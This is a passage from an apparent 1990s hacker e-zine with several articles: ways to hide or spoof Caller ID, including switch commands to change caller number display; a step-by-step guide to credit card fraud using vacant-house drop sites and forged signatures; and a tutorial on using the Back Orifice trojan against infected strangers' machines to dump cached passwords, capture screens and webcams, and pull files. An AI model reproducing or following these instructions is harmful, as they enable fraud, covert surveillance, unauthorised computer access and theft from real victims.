not even by *57. Not even if the person who you call has Mulder and
Scully hanging over your shoulder trying to get an FBI trace (sic).
Janet Reno himself couldn't subpoena your identity. It's not your
phone, not your problem, AND it will get past "block the blocker"
services. So it's not a totally useless suggestion, even if you
have already thought of it.
(3) Go through an operator. This is a more expensive way of doing it
($1.25-$2.00 per call), you can still be traced, and the person
you're calling WILL be suspicious when the operator first asks for
them, if you have already tried other Caller ID suppression methods
on them.(4) Use a prepaid calling card. This costs whatever the per-minute
charge on the card is, as they don't recognize local calls. A lot
of private investigators use these. A *57 trace will fail but you
could still be tracked down with an intensive investigation (read:
subpoena the card company). The Caller ID will show the outdial
number of the Card issuer.
(5) Go through a PBX or WATS extender. Getting a dial tone on a PBX is
fairly easy to social engineer, but beyond the scope of this file.
This is a well-known and well-loved way of charging phone calls to
someone else but it can also be used to hide your identity from a
Caller ID box, since the PBX's number is what appears. You can even
appear to be in a different city if the PBX you are using is! This
isn't very legal at all. But, if you have the talent, use it!
(6) I don't have proof of this, but I *think* that a teleconference
(Alliance teleconferencing, etc.) that lets you call out to the
participants will not send your number in Caller ID. In other
words, I am pretty sure the dial tone is not your own.
(7) Speaking of dial tones which aren't yours, if you are lucky enough
to live in an area with the GTD5 diverter bug, you can use that to
get someone else's dial tone and from thence their identity.
(8) Still on the subject of dial tones which aren't your own, you can
get the same protection as with a payphone, but at greater risk,
if you use someone else's line - either by just asking to use the
phone (if they'll co-operate after they hear what you're calling
about) or by the use of a Beige Box, a hardware diverter or bridge
such as a Gold Box, or some other technical marvel.
(9) This won't work with an intelligent human on the other end, it
leaves you exposed if the called party has a regular Caller ID box
with memory, and has many other technical problems which make it
tricky at best and unworkable for all but experts. A second Caller
ID data stream, transmitted from your line after the audio circuit
is complete, will overwrite the true data stream sent by the telco
during the ringing. If the line you are calling is a BBS, a VMB, or
some other automated system using a serial port Caller ID and
software, then you can place your call using *67 first, and then
immediately after the other end picks up, send the fake stream. The
second stream is what the Caller ID software processes, and you are
allowed in. See the technical FAQs below for an idea of the
problems behind this method; many can be solved.
(10) Someone in alt.2600 (using a stolen AOL account, so I can't credit
him or her properly) suggested going through 10321 (now 10-10-321)
or 10288. Apparently using a 10xxx even for a local call causes
"Out of Area" to show up on the Caller ID display. I live in Canada
where we don't have 10xxx dialing so I can't verify nor disprove this.
(11) There are 1-900 lines you can call that are designed to circumvent
Caller ID, ANI, traces, everything. These services are *very*
expensive, some as high as $5.00 a minute, but they include long
distance charges. This was first published in 1990 in 2600
magazine, and in 1993 the IIRG reported that 1-900-STOPPER still
works. Beware - even if you get a busy signal or no answer, you
will get charged at 1-900 rates! Another one published in 2600 in
1990: 1-900-RUN-WELL. That one supposedly allows international
calls. I'm not about to call either one to find out. Note that you
could still be caught if the operators of these services were to be
subpoenaed.
(12) Use an analog cellular phone. Most providers of plain old analog
service show up on Caller ID as "Private" or "Out of Area" or a main
switchboard number for the cell network. This is becoming less and
less true as cellular providers move to digital cellular and PCS,
which pass the phone's number on Caller ID. Corollary: Rent a
cellphone by the day. This might even be cheaper than using a
prepaid phone card.
3.2 - Alternate CallerID Information
If your under a DMS-100 switch, you can change your Caller ID information
to anything that you would like it to be. Not your ANI, just your CND (and
your CNAM). You can do it 1 of 3 ways. Hack the switch, Social Engineer, or
have a friend on the inside do it. This also is stolen, from usenet. It also
is really well written.
SDNA (Setting Up DN Attributes) plenty of examples in HELMSMAN (DMS on-line help)
The following is accomplished in SERVORD:
SDNA [return]
[prompt] SNPA:
[prompt] OFFICE CODE:
[prompt] FROM DIGITS:
[prompt] TO DIGITS:
[prompt] NET NAME:
[prompt] FUNCTION:
[prompt] OPTION:
[prompt] NPA:
[prompt] OFFICE CODE:
[prompt] DIGITS:
YES to confirm
... updating (does so immediately)
SNPA is the area code of the line this is being done on.
OFFICE CODE is the exchange/prefix of the line this is being done on.
FROM DIGITS is the last four digits of the line this is being done on.
TO DIGITS is also the last four digits of the line this is being done on. (It
can be done to a series of lines.)
NET NAME is PUBLIC
FUNCTION - there are three legit functions ADD add. CHA change. DEL delete
(self-explanatory)
OPTION is ADDRESS (phone number)
NPA is area code you want your new Caller ID to be
OFFICE CODE is the new exchange/prefix you want to have
DIGITS are the last four digits of the new Caller ID to be!
YES to confirm
....updating
Now you can call anyone who has Caller ID and they will think you are calling
from the number you changed it to.
Please note the following effects and ramifications:
ANI still passes normally. It is only the Caller ID signal which changes.
So anyone doing serious investigating at the phone company can still pull Last
Incoming Call, etc., correctly.
Billing is not affected. That is, you cannot bill to the virtual (artificial
number).
Call Return will call back the Caller ID, so if it's in the same area, it will
call back the number. If the Caller ID you chose is from a different area,
Call Return won't work. This is one of my favorites. Since having a non-pub
number doesn't stop people from Call Returning you. Now it does!!
800 numbers: AT&T 800's will always get your ANI. MCI tends to usually grab
your ANI. Operator 800's will definitely get your ANI. (800-225-5288).
Sprint 800's can be configured either way. For example, AOL (America On Line)
800's get ANI. (yes, they resporg to Sprint). However, Western Union, and
other Sprint 800's read the Caller ID. Most newer 800's read the Caller ID,
but one must test to know for sure.
The above method of altering Caller ID on a line is the only legitimate way I
have ever found to do so that really works. Can the same thing be done on
5ESS? Not that I am aware of, and I have researched it pretty thoroughly. I
have not researched Siemens switches, or others. Tchau for now. Have phun.
4.a - Glossary
Glossary
ACK -- Acknowledgment
ANI -- Automatic Number Identification
ASCII -- American Standard Code for Information Interchange
BFSK -- Binary Frequency Shift Keying
CAS -- CPE Alerting Signal
CID -- Caller Identification or Caller ID
CIDCW -- Calling Identity Delivery on Call Waiting or Caller ID on Call Waiting
CNAM -- Calling Name Delivery
CND -- Calling Number Delivery
CPE -- Customer Premise Equipment
CPNM -- Calling Party Number Message
DTMF -- Dual-Tone Multifrequency
FCC -- Federal Communications Commission
FSK -- Frequency Shift Keying
ID -- Identification
LATA -- Local Access and Transport Area
LSB -- Least Significant Bit
LSSGR -- LATA Switching Systems Generic Requirements
MDMF -- Multiple Data Message Format
OSI -- Open Switch Interval
PC -- Personal Computer
SAS -- Subscriber Alerting Signal
SDMF -- Single Data Message Format
SPCS -- Stored Program Control Switching System
SS7 -- Signaling System 7
4.b - Resources on the internet
http://www.markwelch.com/callerid.htm
http://members.xoom.com/hoal/cpid-ani.txt
http://bc1.com/users/fixer/files/BEATCID.TXT
-hatredonalog
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 4. Carding.......Unexplored Territory Vol. 2 of 2 ³
³ by Neptunium Overkill (quixilver@mailexcite.com) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DISCLAIMER: The activity described in this article is highly illegal and
you can get a long time in jail for doing it. Be careful if you ever do
it and REMEMBER, no one is responsible for your actions but yourself.
Make sure you read Carding.......Unexplored Territory Vol. 1 of 2,
published in DPP 8.
INTRO: So you've got yourself some credit card numbers and now you want to
buy neet stuff for you and your buds. In this article you will learn how
easily and safely order things with your cards. If you read and follow the
instructions carefully you will have no trouble receiving your packages.
OK, well let's get started.
The first thing you will need to do is find a place to drop the
stuff you are going to order. Now, if you are a real dope you might be
thinking "Hey! I can just get the stuff shipped to my house! The cops
will never find out!" Sorry, but that just isn't going to work. Yes,
the stuff would probably come as planned but then after the card owner
receives the bill and calls the company to complain that they didn't
buy any of this, the card company will call the store and ask who the
items were shipped to. The store will then pull up the address the gear
was shipped to and it will just happen to be your address. I trust that
you know what would happen after that. Anyway, you are going to need
a drop site. The thing I recommend is an empty house or apartment OR
if you are real careful you can have the stuff shipped while the resident
of the house is at work. Take a walk around you neighborhood and you
are sure to find a good drop site. If you are unsuccessfull you can
ask your CLOSE friends if they know of any vacant houses near them.
Once you have a place to use, write down the address. You are now
finished with step one.
The second step is ordering the items. There are three ways
to order stuff: www, phone, or mail. To order using the web make sure
the company you want to order has internet ordering (duh). If they
don't, look around, you can buy all kinds of stuff on the net and
there is probably someone who sells what you want via the web. For
extra security, you may want to use a PPP/SLIP account other than
the one that has your or your parents' name on it or a shell account
that you have aquired, but you will probably be just fine using your
own account to order the merchandice. Pretty self-explanitory after
that. To order by phone, there are two precautions to take: first,
don't use your own phone line. Use your beige box and dial away.
The other precaution is that if you are going to have to have a somewhat
low voice......if you are 16+ then you will pass as an 18 year old,
but if you are 12 and sound like a little kid or something, then don't
try it. If you are not sure if you could pass as a credit card owner,
then get a CLOSE friend with a lower voice to call. The last way to
order things is by US Mail. Now, just pick what you want out of the
catalog, fill out the order form, but remember: be VERY careful on
the signature. Practice a realistic looking signature many times on
a sheet of paper until you think it looks belivible. Now, check over
your order form, and stick in in the envelope. Now, when you mail the
order form, it will probably work fine just to mail it from a public
mail box (don't do it from your house), but if you want to be really
convincing then find a hacker/phreak/cool person in the city of the
cardholder, stick the orderform's envelope in a larger envelope and
adress that one to them, then have them mail the order form's envelope
(this will make it look like the cardholder is buying someone in your
city a birthday present.
The third and final step is to pick up the gear. What you
will have to do now is write a note for the UPS man. Have it say
something like "Hi. I am at work right now so please leave it on the
doorstep. Thank you." Make sure you have the note out there before 9
A.M. on the first possible day the package could arrive. This almost
always works. Anyway, that's about it. If you have questions you
can e-mail me.
HEY!!!!!!!: Fast T3 Shells! Always up! For less money than you make
in an hour at work! Only $5 a month from www.darksphere.net. Last
one there is a rotten mango!
-neptunium overkill
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 5. Back Orifice for Fun and Profit, part 1 of 5 ³
³ by MMX Killa(help@beer.com) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Fact: There have been over 250,000 downloads of Back Orifice since it's
release in August.
Fact: Approximately 74% of Australian Internet providers are infected with
Back Orifice.Fact: Back Orifice can be more fun and fulfilling than prank calls.
Opinion: Back Orifice can be more fun and fulfilling than masturbation.
What do all of these facts mean to you? NOTHING. Anyway, let's say that
you were a shrewd hacker punk, and you woke up one Sunday at 3PM, and said
"hey! I think I'll take over a random person's computer today!" How would
one go about completing such an audacious task? The answer to that, my
friend, is Back Orifice.
Back Orifice, a tool designed by the Cult of the Dead Cow (I bow to the
cow!), is a remote administration tool that was designed to be used for the
purposes of good. However, history has shown us that when hackers design
tools that are "good", they usually give the hacker a purpose. Take, for
example, S.A.T.A.N. SATAN, or System Administrator's Tool for Analyzing
Networks, is a portscanner, that allows one to see vulnerabilities on their
network. Yes, a sysop can use this to strengthen their network, and yes, a
hacker could use this to see where other networks need strengthening. Back
Orifice is very similar to this. Back Orifice is a tool that is installed
on a person's (target's) computer, that allows the sysop (hacker) to obtain
full control of that machine.
Back Orifice can log keystrokes, capture screen images, edit the registry,
make and break network shares, show cached system passwords, spawn programs,
redirect ports, reboot the machine, pop up cute lil dialog boxes, and it
also slices, dices, and makes julian fries. Think about that for a moment:
you could literally have more power from your home then the person at the
keyboard of the machine has. Hell, you could add format commands in
someone's autoexec.bat file, you could spawn twenty of those annoying
"sheep" programs, and then capture a picture to show all of your friends at
school why the new Indian kid is crying in the corner. Why, you might ask?
Because he was owned!
Let's begin this lesson by going over what's packaged with Back Orifice that
you will need to own your neighborhood. First, unzip the file that you
downloaded. If you suddenly find yourself in an AOL chat room asking for
31337 WaReZ d00dz to help you run Back Orifice, then I'm sorry, you're
beyond help. You'll find afew files. You should find all of these:
bo.txt - the user's guide
plugin.txt - a text for people who want to write plugins (BUTTplugs)
boserve.exe - please, don't run this on your machine.
bogui.exe - the Back Orifice GUI client (ie: windows form type)
boclient.exe - the Back Orifice command line client (ie: DOS)
boconfig.exe - the utility to configue your server before you install it.
melt.exe - a decompressorfreeze.exe - a compressor
Okay, if you didn't get all of these files, I'd suggest downloading Back
Orifice again. Hell, from now on, I'm not typing "Back Orifice". I'm just
going to put down "BO". Anyway, the two files that you'll definitely need
are boclient.exe and bogui.exe. If you want to install copies of BO on
other people's machines, then keep boserve and boconfig. The texts are good
references, and the only thing that melt and freeze are good for are
downloading screen shots quickly.
Command Line client (the most useful for most things)
Anyway, let's go over some basic commands. To find and connect to a host,
you'll have to use the sweep and host commands. For some reason, I cannot
get the sweeper to work in the GUI client. Now, let's say you know the
subnet of the person that you're looking for. If that person's IP address
usually began with 206.152.172, then that would be the subnet that you would
sweep. So you'd type in this:sweep 206.152.172
If you're lucky, you'll see something like this:
---------- Packet received from host 206.152.172.124 port 31337 ---------
!PONG!1.20!DEFAULT!------------------------- End of Data -------------------
Congratulations! You found a computer that's been infected with back
orifice! Of course, this may not be the computer that you're looking for,
but it is at least a computer that you can practice your basic skills on.
So how do I do anything from here? I'll look at what I see on my screen,
and I'll analyze it. The format for the Pong response is this:
!PONG!version!computername!
In most cases, you'll be able to tell if this is your target just by the
computer name. However, in alot of cases, the computers are just named
"DEFAULT", so you'll have to connect to it for more information. It says
"Packet received from host 206.152.180.124 port 31337". It doesn't take a
genious to figure out that this means that the IP address that you'll use is
206.156.172.124. So to set your client to talk to that host, type in:
host 206.156.172.124
Great! You're setup to own that host now. So how can I determine if this
is my target or not? Simple, just use the INFO command! The info command
gives you some basic info about your target host, such as the user login
name, and more. Let's look at a sample response to the command of:info
You'll type that, and your target will spew up something like this:
------- Packet received from 206.156.160.101 port 31337 -------
System info for machine 'DEFAULT'Current user: 'Barry'Processor: I586
Win32 on Windows 95 v4.0 build 950
Memory: 39M in use: 90% Page file: 366M free: 335M
C:\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 350289920/1279688704
D:\ - CD-ROME:\ - RemovableEnd of system info------- End of data -------
Now of course this is just a sample, and it would be really bad if we were
just targeting some lame pedophile who we found by accident. So anyway,
let's look at the response. It tells you the computer name, the user
that's currently logged in, what kind of processor the computer is running,
the operating system that your target is using, memory statistics, and drive
information. The string of numbers after the hard drive letter is of course
"freespace/totalspace", but for some reason BO is not capable of detecting
anything more than 2GB, so FAT32 users will still be listed as 2GB capacity.
The next command that we'll learn is the passes command. As you may have
already guessed, this will give you information on any password stored in
the users cached passwords file. This is MSIE only, so nothing that's a
netscape cached password will show. So you'd type in the passes command,
and you'll see a response like this:
------- Packet received from 206.152.167.64 port 31337 -------
Password cached by system:index:02(01) len:16(07/12)
Resource: 'HUSEMAN' Password: 'X'index:00(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
Resource: '*Rna\Worldpath\Chevalier72' Password: 'PMKNC19'
index:01(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password:
'icwsignup'End of cached passwords.ScreenSaver password: 'MILENKO'
------- End of data -------
Now naturally, the last item in this list is the screen saver password. If
the computer doesn't have a screen saver password, it'll just say "Unable to
read value 'ScreenSave_Data'" Don't worry about it. The "index:" line
means shit to a beginner, it's just about where BO found the information.
Then "len:" line means how strong the encryption on the password was. Afew
tips and tricks about this feature:
Any value that starts with *Rna\ is a dialup networking password, with the
name for the connection next, and then the user name.
The two things that you can out right ignore are the "MAPI" and the
"Microsoft Internet Referral Service" passwords. They are on almost every
computer, it's just some bullshit about signing up to the internet for the
first time.The format for the resource is this:
'NAME OF RESOURCE\USERNAME' Password: 'whatever'
Just because the name of a resource is a www.whatever.org, it doesn't mean
that the actual place to put in your password is whatever.org. It's a very
wierd thing. But for the most part, you can ignore everything but what's
the beginning and the end values.
Now, you have pretty much already owned this person. But now you wonder,
"What are they doing right now?"
Well, there are two ways of finding out. One way is to use the PROCLIST
command. PROCLIST is a neat feature that allows you to see all of the
programs that your target computer is running. Here's an example of a
response from a computer (shortened):
------- Packet received from 206.152.167.145 port 31337 -------pid - Executable
4291799303 C:\WINDOWS\SYSTEM\KERNEL32.DLL
4294936047 C:\WINDOWS\SYSTEM\MSGSRV32.EXE4294963087 C:\WINDOWS\SYSTEM\MPREXE.EXE
4294954415 C:\WINDOWS\mediaplt\ecidmn.exe
4294457359 C:\PROGRAM FILES\DR SOLOMON'S\ANTI-VIRUS\WGFE.EXE
4294954603 C:\WINDOWS\SYSTEM\ .EXE
4294468987 C:\PROGRAM FILES\DISTRIBUTED.NET\RC5DESG.EXE
4294460775 C:\WINDOWS\EXPLORER.EXE4294507799 C:\WINDOWS\SYSTEM\SYSTRAY.EXE
4294497487 C:\WINDOWS\YBOT.EXE4294492751 C:\PROGRAM FILES\AIM95\AIM.EXE
4294547167 C:\WINDOWS\SYSTEM\RNAAPP.EXE4294535895 C:\WINDOWS\SYSTEM\tapiexe.exe
4294541983 C:\WINDOWS\SYSTEM\LIGHTS.EXE4294583531 C:\PROGRAM FILES\ICQ\ICQ.EXE
4294609115 C:\INFINET\NETSCAPE\PROGRAM\NETSCAPE.EXEEnd of processes
------- End of data -------
Take note in this to the fact that it shows the hidden system processes such
as Kernel32.dll, Msgsrv32.exe, and explorer.exe. And do you want to know a
really super neat trick? If you use PROCLIST's sister commands, PROCSPAWN
and PROCKILL, you can start and kill programs, respectively.
As you're probably not wondering, the numbers next to the file name of the
program that's running is the PID. When using the PROCKILL command. So in
the example above, the PID for Netscape is 4294609115. So to kill this, I
would type in:PROCKILL 4294609115!!!!! Super Genious Idea !!!!!
Use the prockill command with the PID of " .exe" and watch as none of your
commands go through until they restart the computer!
!!!!! Super Genious Idea !!!!!
In the same light, if I had uploaded a program to the server, or I just
wanted to run a program on their computer, I could use the PROCSPAWN
command. To use this, type in PROCSPAWN, followed by the FULL path of the
program, including drive letter. So if you wanted to run a file called
c:\windows\sol.exe (solitaire), I would type:PROCSPAWN C:\Windows\sol.exe
It's alot easier than it seems, isn't it? Suddenly and magically, Solitaire
would begin running. It might not popup as the active window, but it would
still run and appear in their taskbar.
Continuing with the "What are they doing?" theme, you can use a really fun
command - the CAPSCREEN command. As you may have guessed from the name,
this captures the screen image and saves it to a specified file. This is
shockingly similar to the "Print Screen" key on your computer. So, to use
this, you'll just type in CAPSCREEN and then the file it should be saved as.
So if I wanted to save it as screen.bmp (the format is a bitmap), I would
type in:CAPSCREEN c:\screen.bmp
The typical response to this is something like this:
------- Packet received from 206.152.167.145 port 31337 -------
Bitmap (800x600x16) captured to c:\screen.bmp------- End of data -------
The format for the response is: Bitmap (WIDTHxHEIGHTxCOLOR DEPTH). For
those of you who don't know what color depth is, it's the number of bits
used for color assignment. The larger the number, the more bits used,
hence the more possible colors. To retrieve this file, you'll have to use
the HTTP server, which we'll get into later.!!!!! Super Weird Software Bug !!!!!
Sometimes, you'll capture a screen shot that has it's color depth set higher
than your video card is set to. If you're running 256 colors, and sometimes
even 16-bit High Color you'll run into a weird problem: the colors will be
fucked up. I don't believe that there is a solution to this problem other
than to just set your video card to a higher color depth.
!!!!! Super Weird Software Bug !!!!!
Another super fun thing to do is to use their QuickCam or other video
capture devices. Sometimes, you get to see who you're owning! The first
thing that you'd have to do is find out if they even have a video capture
device. Use the LISTCAPS command to get a list of devices. When the
packets come back, each capture device (if any) will have a number next to
them, usually a 0 or a 1, since most people don't have 3 or more QuickCam's
on their comp. Once you have determined that they own a capture device,
you can use the CAPFRAME and CAPAVI commands to see what they're doing.
The difference between these two is frighteningly obvious. The CAPFRAME
command captures one individual frame of video from the capture device, and
saves it to a specified file in bitmap format. This is a complex command,
so follow along. The format is this:
CAPFRAME BITMAPFILENAME devicenumber,width,height,bitplanes
So if the person's QuickCam was device 0 on their comp, and I wanted to save
a 16-bit, 640x480 image to c:\windows\temp\quickcam.bmp, I would type in:
CAPFRAME c:\windows\temp\quickcam.bmp 0,640,480,16
Remember, bitplanes are your color depth. Most people run their computers
at 16-bit or 30-bit. However, 256 color mode for older computers is
actually 8-bit, so if you're running 256 colors, don't waste video memory
with anything higher than 8-bit. Once again, you'd have to retrieve this
file with the HTTP server, but we will, soon enough, get into this.
The CAPAVI command is in a very similar format to CAPFRAME, so just look:
CAPAVI AVIfilename seconds,device,width,height,bitplanes
The only difference is that before the device number, I'd put the number of
seconds to record. So to record a 10 second, 16-bit, 640x480 from the
QuickCam, device 0, saved to c:\windows\temp\quickcam.avi, I would type:
CAPAVI c:\windows\temp\quickcam.avi 10,0,640,480,16
And then once again retrieve it with the HTTP server.
So how the fuck do you get all of these files that you've just saved on
their computer? Simple: Back Orifice has a built in HTTP server, so spiffy
that you'll want to run it as soon as you connect to a target host. Now
this is really really easy to do, so listen really carefully: It's HTTPON
portnumber, so to turn the HTTP server on using port 80 (please, just use
80), I'd use:HTTPON 80
Of course, there is an HTTPOFF command, but since there would really be no
reason for you to turn it off, I'm just going to tell you how to use it
anyway. Type in HTTPOFF. Done.
Of course, you'll need a quality browser like Netscape to do this, because I
have never gotten MSIE 4.0 to work properly with this. So fucking download
Netscape NOW!
Well, for the time being, that's it. Check back the next time DPP publishes
an article for more.PLA914's Back Orifice Proposition:
Don't ya just hate it sometimes when someone takes over your territory?
Well... Why not do this: Prepare a text file that lists your handle, and
your territory (the specific subnets, don't just say, "I own 152.*"), and
save it as OWNED.TXT. Then, using the HTTP server, upload it to their C:
drive. Hopefully, if more people begin to do this, people will stop fucking
around with your targets, and you can take over your territory freely. By
the way: if you suspect that someone else is connected to the same computer
you are, look for text like this:[Lost 4 Packets?]That's the telltale giveaway.
-MMX_Killa
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 6. Outro: Opossum ³
³ by hatredonalog (hatredonalog@hotmail.com ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Well, DPP is going to die for a while. How long you say? Oh, about
3-4 monthes. After that we'll come back to life, do a reorg of the
group, take on some new talent that i've wanted to come on board for
a little while (you know who you are) and go through a total change
in appearance. At this stage we still look like a bunch of immature
script kiddies (*not* what i had intended).
The reasons for our temporary death is simple. Our writing/Editing
Staff has damn near fallen off the face of the earth. First
Dark|||Knight went missing (jail?) and napalmoliv has also
disappeared (work and school ate him), Sphinx is without a boxen
and the rest of us have gotten pretty lazy. A large majority my time
has been taken up by school and work (and sleeping). Even though
overkill, mmx_killa, nothingg and myself _could_ run the zine, we
haven't had much to publish. I wrote a rather good linux
tutural, but due to a computer problem, it was erased. Now im sure
it's sitting physically on the drive, but i can't get it. =(
Well, that's about the long and short of it. I'm going to be trying
to recruit some new writers (who will write stuff!), and i'll probably
be the only editor (cause i can get them out on time, due to not having
a life). When we do come back, we will have a new look, a new style,
and we'll still be your p1mp.
-hoal
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
<EOF>
"Sir, We've stopped producing DPP, and if your going to get violent
about it I'm going to have to go get my manager..." -hoal
"We've stopped producing DPP, now pick up the peices of your shattered
life and move on." - Neptunium Overkill
